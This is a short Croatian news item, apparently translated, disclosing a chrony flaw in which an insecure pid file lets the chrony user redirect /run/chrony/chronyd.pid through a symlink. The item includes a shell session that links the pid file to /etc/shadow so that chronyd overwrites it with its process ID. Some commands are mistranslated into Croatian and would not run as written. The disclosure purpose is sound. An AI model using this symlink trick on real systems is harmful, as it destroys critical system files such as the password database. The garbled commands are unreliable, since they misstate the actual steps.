В
Ranjivost je uzrokovana nesigurnim stvaranjem pid datoteke, koja je stvorena u fazi kada chrony još nije resetirao privilegije i bio je pokrenut kao root. U ovom slučaju, direktorij /run/chrony, u kojem je zapisana pid datoteka, kreiran je s pravima 0750 preko systemd-tmpfiles ili kada je chronyd pokrenut u suradnji s korisnikom i grupom “chrony”. Dakle, ako imate pristup korisniku chrony, moguće je zamijeniti pid datoteku /run/chrony/chronyd.pid simboličkom vezom. Simbolička veza može upućivati na bilo koju sistemsku datoteku koja će biti prebrisana kada se chronyd pokrene.
root# systemctl zaustavi chronyd.service
root# sudo -u chrony /bin/bash
chrony$ cd /run/chrony
chrony$ ln -s /etc/shadow chronyd.pid
chrony$ izlaz
root# /usr/sbin/chronyd -n
^C
# umjesto sadržaja /etc/shadow bit će spremljen ID chronyd procesa
root# cat /etc/shadow
15287
Ranjivost
SUSE i openSUSE problem
Izvor: opennet.ru